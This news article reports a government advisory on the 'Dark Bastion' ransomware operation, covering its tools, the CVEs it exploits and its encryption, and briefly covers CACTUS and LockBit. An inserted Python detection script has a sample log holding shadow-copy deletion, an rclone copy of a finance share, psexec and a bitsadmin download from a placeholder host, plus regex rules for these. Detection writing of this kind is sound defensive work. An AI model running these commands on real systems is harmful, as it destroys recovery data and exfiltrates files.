The Dark Bastion ransomware-as-a-service (RaaS) operation has targeted over 500 private industry and critical infrastructure entities in North America, Europe, and Australia since its emergence in April 2022.
In a collaborative advisory published by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), the agencies stated that the threat actors encrypted and stole data from at least 12 out of 16 critical infrastructure sectors.
"Dark Bastion affiliates utilize common initial access techniques, such as phishing and exploiting known vulnerabilities, before implementing a dual-extortion model, encrypting systems, and exfiltrating data," the bulletin read.
In contrast to other ransomware groups, the ransom notes delivered at the end of the attack do not contain an initial ransom demand or payment instructions. Instead, the notes provide victims with a unique code and instruct them to contact the gang via a .onion URL.
Dark Bastion was initially observed in April 2022 using QakBot as an initial access vector and has remained a highly active ransomware actor since then.
Statistics gathered by Malwarebytes indicate that the group has been linked to 28 out of the 373 confirmed ransomware attacks that occurred in April 2024. According to Kaspersky, it was the 12th most active family in 2023. Dark Bastion has also seen an uptick in activity in Q1 2024, increasing by 41% quarter-over-quarter.
There is evidence suggesting that the Dark Bastion operators have connections to another cybercrime group known as FIN7, which has transitioned to conducting ransomware attacks since 2020.
Attack chains involving the ransomware have relied on tools such as the SoftPerfect Network Scanner for network discovery; BITSAdmin, Cobalt Strike beacons, ConnectWise ScreenConnect, and PsExec for lateral movement; Mimikatz for privilege escalation; and RClone for data exfiltration prior to encryption.
Other methods used to gain elevated privileges include the exploitation of security flaws such as ZeroLogon (CVE-2020-1472), NoPac (CVE-2021-42278 and CVE-2021-42287), and PrintNightmare (CVE-2021-34527).
In some cases, the deployment of a tool called Backstab to disable endpoint detection and response (EDR) software has been observed. It is worth noting that Backstab has also been utilized by LockBit affiliates previously.
The final step involves file encryption using the ChaCha20 algorithm in combination with an RSA-4096 public key, preceded by the deletion of volume shadow copies via the vssadmin.exe program to hinder system recovery.
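As an added defender-side illustration (not code from the advisory or the article), the following Python snippet scans process-creation log lines for the tool usage described above: vssadmin shadow-copy deletion, RClone copy jobs, PsExec execution, and BITSAdmin transfers. The log format, hostnames, and command lines are constructed assumptions.

```python
import re

# Constructed sample process-creation log lines (not from the advisory).
# Assumed format: "<timestamp> host=<name> user=<name> cmd=<command line>".
SAMPLE_LOG = """\
2024-04-17T10:01:05Z host=WS01 user=jdoe cmd=C:\\Windows\\System32\\notepad.exe report.txt
2024-04-17T10:02:11Z host=WS01 user=SYSTEM cmd=vssadmin.exe delete shadows /all /quiet
2024-04-17T10:03:40Z host=FS02 user=svc_backup cmd=rclone.exe copy D:\\Shares\\Finance remote:drop --transfers 8
2024-04-17T10:04:02Z host=DC01 user=admin cmd=psexec.exe \\\\FS02 -s cmd.exe
2024-04-17T10:05:30Z host=WS03 user=jdoe cmd=bitsadmin.exe /transfer job /download http://example.invalid/a.dll C:\\Users\\Public\\a.dll
2024-04-17T10:06:00Z host=WS01 user=jdoe cmd=vssadmin.exe list shadows
"""

# Each rule: (name, compiled pattern applied to the command line).
# Patterns mirror the tool usage named in the article; MITRE ATT&CK IDs are standard.
RULES = [
    ("shadow_copy_deletion (T1490)", re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b", re.I)),
    ("rclone_exfil_candidate (T1567)", re.compile(r"\brclone(\.exe)?\b\s+(copy|sync|move)\b", re.I)),
    ("psexec_remote_execution (T1569.002)", re.compile(r"\bpsexec(64)?(\.exe)?\b", re.I)),
    ("bitsadmin_transfer (T1197)", re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I)),
]

LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")

def detect(log_text):
    """Return a list of (rule_name, host, command_line) for each matching line."""
    hits = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # skip lines that do not follow the assumed format
        cmd = m.group("cmd")
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((name, m.group("host"), cmd))
    return hits

if __name__ == "__main__":
    for name, host, cmd in detect(SAMPLE_LOG):
        print(f"[{name}] {host}: {cmd}")
```

Note that a benign `vssadmin list shadows` does not fire the deletion rule; only the destructive `delete shadows` form does.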
"Healthcare organizations are appealing targets for cybercrime actors due to their scale, reliance on technology, access to personal health information, and unique challenges from disruptions to patient care," the agencies stated.
These developments coincide with a CACTUS ransomware campaign that continues to exploit security flaws in a cloud analytics and business intelligence platform called Qlik Sense to gain initial access to target environments.
A recent analysis by NCC Group's Fox-IT team has revealed that, as of April 17, 2024, 3,143 servers are still vulnerable to CVE-2023-48365 (also known as DoubleQlik), with the majority located in the U.S., Italy, Brazil, the Netherlands, and Germany.
The ransomware landscape is evolving, with an 18% decrease in activity in Q1 2024 compared to the previous quarter, primarily driven by law enforcement operations against ALPHV (also known as BlackCat) and LockBit.
With LockBit experiencing significant reputational damage among affiliates, it is speculated that the group will likely attempt to rebrand. "The DarkVault ransomware group is a potential successor to LockBit," cybersecurity firm ReliaQuest noted, citing similarities in branding with LockBit.